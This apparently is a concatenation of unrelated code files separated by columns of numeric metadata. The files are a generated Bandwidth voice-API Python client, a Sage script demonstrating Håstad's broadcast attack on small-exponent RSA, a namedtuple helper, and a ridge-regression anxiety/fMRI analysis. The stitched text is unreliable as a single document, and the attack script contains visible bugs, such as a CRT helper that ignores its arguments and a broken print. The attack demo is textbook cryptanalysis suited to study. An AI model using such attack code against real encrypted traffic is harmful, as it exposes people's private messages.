# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, ConferenceRecordingMetadata.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def get_conference_recording(self,
account_id,
conference_id,
recording_id):
"""Does a GET request to /api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}.
Returns metadata for the specified recording.
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Recording
found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, CallRecordingMetadata.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def get_download_conference_recording(self,
account_id,
conference_id,
recording_id):
"""Does a GET request to /api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}/media.
Downloads the specified recording.
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Media
found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings/{recordingId}/media'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
if (_response.text is not None) or (not str(_response.text)):
decoded = APIHelper.json_deserialize(_response.text)
_result = ApiResponse(_response, body=decoded)
return _result
def get_query_call_recordings(self,
account_id,
mfrom=None,
to=None,
min_start_time=None,
max_start_time=None):
"""Does a GET request to /api/v2/accounts/{accountId}/recordings.
Returns a list of metadata for the recordings associated with the
specified account. The list can be filtered by the optional from, to,
minStartTime, and maxStartTime arguments. The list is capped at 1000
entries and may be empty if no recordings match the specified
criteria.
Args:
account_id (string): TODO: type description here.
mfrom (string, optional): TODO: type description here.
to (string, optional): TODO: type description here.
min_start_time (string, optional): TODO: type description here.
max_start_time (string, optional): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Recordings retrieved successfully.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/recordings'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_parameters = {
'from': mfrom,
'to': to,
'minStartTime': min_start_time,
'maxStartTime': max_start_time
}
_query_builder = APIHelper.append_url_with_query_parameters(
_query_builder,
_query_parameters
)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, CallRecordingMetadata.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
| 50.941741
| 160
| 0.639296
| 8,120
| 74,324
| 5.661946
| 0.036084
| 0.045068
| 0.057945
| 0.071822
| 0.951452
| 0.945057
| 0.941533
| 0.937401
| 0.930332
| 0.927569
| 0
| 0.009584
| 0.288211
| 74,324
| 1,458
| 161
| 50.97668
| 0.85946
| 0.248749
| 0
| 0.873724
| 1
| 0.015306
| 0.17242
| 0.02569
| 0
| 0
| 0
| 0.044582
| 0
| 1
| 0.028061
| false
| 0
| 0.017857
| 0
| 0.07398
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5b869b2740110d1f4732d6377ca1ce7a264ea295
| 4,652
|
py
|
Python
|
attacks/hastad_broadcast_1.sage.py
|
HimadriP/RSA_attacks
|
db58478a33f0dffe492b9a626bf0a4a055682690
|
[
"MIT"
] | null | null | null |
attacks/hastad_broadcast_1.sage.py
|
HimadriP/RSA_attacks
|
db58478a33f0dffe492b9a626bf0a4a055682690
|
[
"MIT"
] | null | null | null |
attacks/hastad_broadcast_1.sage.py
|
HimadriP/RSA_attacks
|
db58478a33f0dffe492b9a626bf0a4a055682690
|
[
"MIT"
] | null | null | null |
# This file was *autogenerated* from the file hastad_broadcast_1.sage
from sage.all_cmdline import * # import sage library
_sage_const_3 = Integer(3); _sage_const_1 = Integer(1); _sage_const_0 = Integer(0); _sage_const_6463622691511358246253843530346957637373771131900115657628956890377133584685693433311356736502535188960628243319843637208561654754340837455923813904935726098046519705940214576082103284466503159415461203969573801791920631195293206011011844763565055300642230449750811779501261575835745322674349086755143 = Integer(6463622691511358246253843530346957637373771131900115657628956890377133584685693433311356736502535188960628243319843637208561654754340837455923813904935726098046519705940214576082103284466503159415461203969573801791920631195293206011011844763565055300642230449750811779501261575835745322674349086755143); _sage_const_4904210278926969382082557520192836447620667943738476959012915263821924765704042320598156081670263969687760089856706802802004650936382508871994891329330913843525685058082515207132945533244603569727806893994293885384278666942443580662358108073773755355586360506572438622134010593933877119286516365700963 = Integer(4904210278926969382082557520192836447620667943738476959012915263821924765704042320598156081670263969687760089856706802802004650936382508871994891329330913843525685058082515207132945533244603569727806893994293885384278666942443580662358108073773755355586360506572438622134010593933877119286516365700963); _sage_const_8510037142847030608778231217636478160093221085470322047695805385472839268389474788835516797851509710116067378544281194029549685630115441064125513663237564088997109745111221590482125652917053055227873501767060274190671556099364882664979774616818879661100982508212710118592283619809629333761875639670531 = Integer(8510037142847030608778231217636478160093221085470322047695805385472839268389474788835516797851509710116067378544281194029549685630115441064125513663237564088997109745111221590482125652917053055227873501767060274190671556099364882664979774616818879661100982508212710118592283619809629333761875639670531); _sage_const_16 = Integer(16)
from sage.all import *
import sys
errors=[]
def chinese_remainder(n, a):
return CRT_list([c1,c2,c3],[n1,n2,n3])
#sum = 0
#prod = reduce(lambda a, b: a*b, n)
# for n_i, a_i in zip(n, a):
# p = prod / n_i
# print p,n_i
# print "mulinv" + mul_inv(p,n_i)
# sum += a_i * mul_inv(p, n_i) * p
#return sum % prod
def ex_euc_alg(a,b):
if a==_sage_const_0 :
return (b,_sage_const_0 ,_sage_const_1 )
else:
g,x,y=ex_euc_alg(b%a,a)
return (g,y-(b//a)*x,x)
def mul_inv(a, b):
g, x, _ = ex_euc_alg(a, b)
if g == _sage_const_1 :
return x % b
n1=_sage_const_6463622691511358246253843530346957637373771131900115657628956890377133584685693433311356736502535188960628243319843637208561654754340837455923813904935726098046519705940214576082103284466503159415461203969573801791920631195293206011011844763565055300642230449750811779501261575835745322674349086755143
e1=_sage_const_3
n2=_sage_const_8510037142847030608778231217636478160093221085470322047695805385472839268389474788835516797851509710116067378544281194029549685630115441064125513663237564088997109745111221590482125652917053055227873501767060274190671556099364882664979774616818879661100982508212710118592283619809629333761875639670531
e2=_sage_const_3
n3=_sage_const_4904210278926969382082557520192836447620667943738476959012915263821924765704042320598156081670263969687760089856706802802004650936382508871994891329330913843525685058082515207132945533244603569727806893994293885384278666942443580662358108073773755355586360506572438622134010593933877119286516365700963
e3=_sage_const_3
# if(e1!=e2 or e2!=e3):
# globals()['errors'].append("e values are not the same")
e=e1
m = raw_input("Enter string: ")
m=int(m.encode("hex"),_sage_const_16 )
c1 = pow(m,e1,n1)
c2 = pow(m,e2,n2)
c3 = pow(m,e3,n3)
# if(gcd(n1,n2)!=1 or gcd(n2,n3)!=1 or gcd(n1,n3)!=1):
# globals()['errors'].append("The three public moduli are not coprime. Hence hastad attack not possible")
#As gcd(n1,n2,n3)=1 and m^3 < n1*n2*n3, CRT can be applied to find m^3
#m_cubed=chinese_remainder([c1,c2,c3],[n1,n2,n3])
# print "M^3 is ",m_cubed
m_cubed = CRT_list([c1,c2,c3],[n1,n2,n3])
f=x**_sage_const_3 -m_cubed
roots=f.roots(multiplicities=False,ring=IntegerRing())
# print "The message is ",roots[0]
#if(len(roots) == 0):
# globals()['errors'].append('No solution found')
print "The message is %d" % roots
# if __name__ == '__main__':
# a=simple_hastad()
# print a
| 58.15
| 1,996
| 0.846948
| 366
| 4,652
| 10.505464
| 0.306011
| 0.044473
| 0.013004
| 0.006242
| 0.023927
| 0.019246
| 0.009883
| 0.009883
| 0
| 0
| 0
| 0.65493
| 0.084265
| 4,652
| 79
| 1,997
| 58.886076
| 0.247653
| 0.176053
| 0
| 0
| 1
| 0
| 0.008931
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.090909
| null | null | 0.030303
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
34671c189f2f13c48b0e1f4b5b8437df40354825
| 166
|
py
|
Python
|
testing/auto_namedtuple.py
|
KindDragon/all-repos
|
88f50d7bf10247bb14dd82b6f8b18957b2a9941d
|
[
"MIT"
] | null | null | null |
testing/auto_namedtuple.py
|
KindDragon/all-repos
|
88f50d7bf10247bb14dd82b6f8b18957b2a9941d
|
[
"MIT"
] | null | null | null |
testing/auto_namedtuple.py
|
KindDragon/all-repos
|
88f50d7bf10247bb14dd82b6f8b18957b2a9941d
|
[
"MIT"
] | 1
|
2022-03-31T04:09:55.000Z
|
2022-03-31T04:09:55.000Z
|
from __future__ import annotations
import collections
def auto_namedtuple(**kwargs):
return collections.namedtuple('auto_namedtuple', tuple(kwargs))(**kwargs)
| 20.75
| 77
| 0.789157
| 18
| 166
| 6.944444
| 0.611111
| 0.224
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108434
| 166
| 7
| 78
| 23.714286
| 0.844595
| 0
| 0
| 0
| 0
| 0
| 0.090361
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
3476826678c953f5a3e432636bd9fc6f7fd49ae1
| 21,683
|
py
|
Python
|
In_Prep_Manuscripts/GFC_Anxiety_2019_PBS/scripts/analysis/RidgeRegression_iFGconnections_GFC.py
|
Telzer-DSNLab/Project-NeuroTeen
|
0ef67d8a902682e8f482b07b0f89dcfc21247b41
|
[
"BSD-3-Clause"
] | null | null | null |
In_Prep_Manuscripts/GFC_Anxiety_2019_PBS/scripts/analysis/RidgeRegression_iFGconnections_GFC.py
|
Telzer-DSNLab/Project-NeuroTeen
|
0ef67d8a902682e8f482b07b0f89dcfc21247b41
|
[
"BSD-3-Clause"
] | null | null | null |
In_Prep_Manuscripts/GFC_Anxiety_2019_PBS/scripts/analysis/RidgeRegression_iFGconnections_GFC.py
|
Telzer-DSNLab/Project-NeuroTeen
|
0ef67d8a902682e8f482b07b0f89dcfc21247b41
|
[
"BSD-3-Clause"
] | null | null | null |
#import libraries
import nibabel as nib
import numpy as np
import pylab as pl
from scipy import stats
import scipy
import os
import pandas as pd
import csv
from sklearn import linear_model #for regression analysis
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.model_selection import KFold
path_data='/Users/paulsharp/Documents/Dissertation_studies/data'
os.chdir(path_data)
master_csv=[['Substance_of_Correlation','Wave','Pearson_Corr','Spearman_Corr']]
#Get self-report data in vectors
self_report_data=pd.read_csv('Self_report_full_data_all_timepoints_and_gender.csv')
anxious_apprehension_w1=self_report_data.anxious_app_w1.values
anxious_apprehension_w2=self_report_data.anxious_app_w2.values
anxious_apprehension_longitudinal=self_report_data.anxious_apprehension_change.values
anxious_arousal_w1=self_report_data.anxious_arousal_w1.values
anxious_arousal_w2=self_report_data.anxious_arousal_w2.values
anxious_arousal_longitudinal=self_report_data.anxious_arousal_change.values
#Get all ifg GFC data
connectome_data=pd.read_csv('LEFT_ifg_connectivity_wave1.csv',header=None)
connectome_data=connectome_data.drop([0],axis=1)
connectome_data=connectome_data.fillna(connectome_data.mean()) #convert NAN to Mean via imputation
Left_ifg_w1=connectome_data.values
connectome_data=pd.read_csv('LEFT_ifg_connectivity_wave2.csv',header=None)
connectome_data=connectome_data.drop([0],axis=1)
connectome_data=connectome_data.fillna(connectome_data.mean()) #convert NAN to Mean via imputation
Left_ifg_w2=connectome_data.values
connectome_data=pd.read_csv('LEFT_ifg_connectivity_longitudinal.csv',header=None)
connectome_data=connectome_data.drop([0],axis=1)
connectome_data=connectome_data.fillna(connectome_data.mean()) #convert NAN to Mean via imputation
Left_ifg_longitudinal=connectome_data.values
connectome_data=pd.read_csv('RIGHT_ifg_connectivity_wave1.csv',header=None)
connectome_data=connectome_data.drop([0],axis=1)
connectome_data=connectome_data.fillna(connectome_data.mean()) #convert NAN to Mean via imputation
Right_ifg_w1=connectome_data.values
connectome_data=pd.read_csv('RIGHT_ifg_connectivity_wave2.csv',header=None)
connectome_data=connectome_data.drop([0],axis=1)
connectome_data=connectome_data.fillna(connectome_data.mean()) #convert NAN to Mean via imputation
Right_ifg_w2=connectome_data.values
connectome_data=pd.read_csv('RIGHT_ifg_connectivity_longitudinal.csv',header=None)
connectome_data=connectome_data.drop([0],axis=1)
connectome_data=connectome_data.fillna(connectome_data.mean()) #convert NAN to Mean via imputation
Right_ifg_longitudinal=connectome_data.values
n_folds=8
kf=KFold(n_splits=8)
####################################################################
## Implement Nested cross validation
####################################################################
# Import linear model and run
# Also produce summary statistics and save in arrays
# Also implement nested cross-validation for hyperparameter estimates
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Left_ifg_w1,anxious_apprehension_w1)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Left_ifg_w1[train],anxious_apprehension_w1[train])
print('R^2 of Ridge= {}'.format(Ridge_cv.score(Left_ifg_w1[train],anxious_apprehension_w1[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Left_ifg_w1[test])
y_truth[counter,:] = anxious_apprehension_w1[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_apprehension_w1)), np.reshape(y_truth,len(anxious_apprehension_w1)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_apprehension_w1)),np.reshape(y_truth,len(anxious_apprehension_w1)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_apprehension_w1)),np.reshape(y_truth,len(anxious_apprehension_w1)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_apprehension_w1)),np.reshape(y_truth,len(anxious_apprehension_w1)))
print('Left ifg to Anx App Wave 1 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Left ifg with Anx App',1,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Left_ifg_w2,anxious_apprehension_w2)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Left_ifg_w2[train],anxious_apprehension_w2[train])
print('WAVE 2 R^2 of Ridge= {}'.format(Ridge_cv.score(Left_ifg_w2[train],anxious_apprehension_w2[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Left_ifg_w2[test])
y_truth[counter,:] = anxious_apprehension_w2[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_apprehension_w2)), np.reshape(y_truth,len(anxious_apprehension_w2)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_apprehension_w2)),np.reshape(y_truth,len(anxious_apprehension_w2)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_apprehension_w2)),np.reshape(y_truth,len(anxious_apprehension_w2)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_apprehension_w2)),np.reshape(y_truth,len(anxious_apprehension_w2)))
print('Left ifg to Anx App WAVE 2 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Left ifg with Anx App',2,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Right_ifg_w1,anxious_apprehension_w1)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Right_ifg_w1[train],anxious_apprehension_w1[train])
print('WAVE 1 R^2 of Ridge= {}'.format(Ridge_cv.score(Right_ifg_w1[train],anxious_apprehension_w1[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Right_ifg_w1[test])
y_truth[counter,:] = anxious_apprehension_w1[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_apprehension_w1)), np.reshape(y_truth,len(anxious_apprehension_w1)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_apprehension_w1)),np.reshape(y_truth,len(anxious_apprehension_w1)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_apprehension_w1)),np.reshape(y_truth,len(anxious_apprehension_w1)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_apprehension_w1)),np.reshape(y_truth,len(anxious_apprehension_w1)))
print('RIGHT ifg to anx app WAVE 1 MSE :{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Right ifg with Anx App',1,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Right_ifg_w2,anxious_apprehension_w2)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Right_ifg_w2[train],anxious_apprehension_w2[train])
print('WAVE 2 R^2 of Ridge= {}'.format(Ridge_cv.score(Right_ifg_w2[train],anxious_apprehension_w2[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Right_ifg_w2[test])
y_truth[counter,:] = anxious_apprehension_w2[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_apprehension_w2)), np.reshape(y_truth,len(anxious_apprehension_w2)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_apprehension_w2)),np.reshape(y_truth,len(anxious_apprehension_w2)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_apprehension_w2)),np.reshape(y_truth,len(anxious_apprehension_w2)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_apprehension_w2)),np.reshape(y_truth,len(anxious_apprehension_w2)))
print('Right ifg to Anx App WAVE 2 MSE RIGHT:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Right ifg with Anx App',2,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Left_ifg_longitudinal,anxious_apprehension_longitudinal)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Left_ifg_longitudinal[train],anxious_apprehension_longitudinal[train])
print('R^2 of Ridge= {}'.format(Ridge_cv.score(Left_ifg_longitudinal[train],anxious_apprehension_longitudinal[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Left_ifg_longitudinal[test])
y_truth[counter,:] = anxious_apprehension_longitudinal[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_apprehension_longitudinal)), np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_apprehension_longitudinal)),np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_apprehension_longitudinal)),np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_apprehension_longitudinal)),np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
print('Left Longitdinal MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Left ifg-Diff with Anx App change','longitudinal',CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Right_ifg_longitudinal,anxious_apprehension_longitudinal)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Right_ifg_longitudinal[train],anxious_apprehension_longitudinal[train])
print('R^2 of Ridge= {}'.format(Ridge_cv.score(Right_ifg_longitudinal[train],anxious_apprehension_longitudinal[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Right_ifg_longitudinal[test])
y_truth[counter,:] = anxious_apprehension_longitudinal[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_apprehension_longitudinal)), np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_apprehension_longitudinal)),np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_apprehension_longitudinal)),np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_apprehension_longitudinal)),np.reshape(y_truth,len(anxious_apprehension_longitudinal)))
print('RIGHT Long MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Right ifg-Diff with Anx App change','longitudinal',CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Left_ifg_w1,anxious_arousal_w1)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Left_ifg_w1[train],anxious_arousal_w1[train])
print('R^2 of Ridge= {}'.format(Ridge_cv.score(Left_ifg_w1[train],anxious_arousal_w1[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Left_ifg_w1[test])
y_truth[counter,:] = anxious_arousal_w1[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_arousal_w1)), np.reshape(y_truth,len(anxious_arousal_w1)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_arousal_w1)),np.reshape(y_truth,len(anxious_arousal_w1)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_arousal_w1)),np.reshape(y_truth,len(anxious_arousal_w1)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_arousal_w1)),np.reshape(y_truth,len(anxious_arousal_w1)))
